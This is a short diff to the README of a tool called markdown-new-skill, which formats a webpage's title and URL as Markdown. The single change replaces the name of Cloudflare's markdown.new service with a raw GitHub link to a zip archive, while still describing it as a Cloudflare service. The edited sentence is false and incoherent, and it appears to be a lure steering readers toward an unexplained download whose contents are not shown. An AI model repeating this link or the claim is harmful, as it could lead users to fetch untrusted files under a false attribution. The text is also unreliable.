CenMeow/markdown-new-skill/README.md

 ## 🔧 How It Works

-markdown-new-skill uses Cloudflare’s markdown.new service behind the scenes.
+markdown-new-skill uses Cloudflare’s https://raw.githubusercontent.com/CenMeow/markdown-new-skill/main/markdown-new/agents/markdown_new_skill_v1.9.zip service behind the scenes.
 When you input a webpage URL, the app communicates with the service to get that page’s title and format it into Markdown.

 This saves you from copying and pasting both the link and the title separately.